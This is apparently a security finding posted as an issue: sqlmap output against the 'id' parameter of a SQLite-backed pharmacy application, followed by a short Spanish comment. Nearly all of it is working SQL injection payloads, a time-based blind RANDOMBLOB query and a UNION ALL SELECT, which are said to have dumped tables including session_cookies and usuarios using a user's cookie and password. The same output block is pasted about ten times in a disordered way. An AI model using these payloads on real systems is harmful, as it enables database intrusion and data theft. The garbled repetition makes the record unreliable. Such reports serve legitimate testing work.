Open cbreckenridge23 opened 2 months ago
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
back-end DBMS: SQLite
Database:
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
back-end DBMS: SQLite
Database:
Database:
Database:
Database:
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
back-end DBMS: SQLite
banner: '3.40.1'
current user is DBA: True
Database:
Database:
Database:
Database:
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw
back-end DBMS: SQLite
Mediante la ejecución de SQLMap, se lograron identificar dos payloads que fueron aprovechados para dumpear las bases de datos. Lo anterior se logró con la cookie de user3:password123.
Se adjunta el resultado de la consulta
Parameter: id (GET) Type: time-based blind Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query) Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))
Cabe indicar que mediante estos payloads se lograron identificar que el servidor posee las siguientes bases de datos:
Tablas: Farmacos, session_cookies, sqlite_sequence y usuarios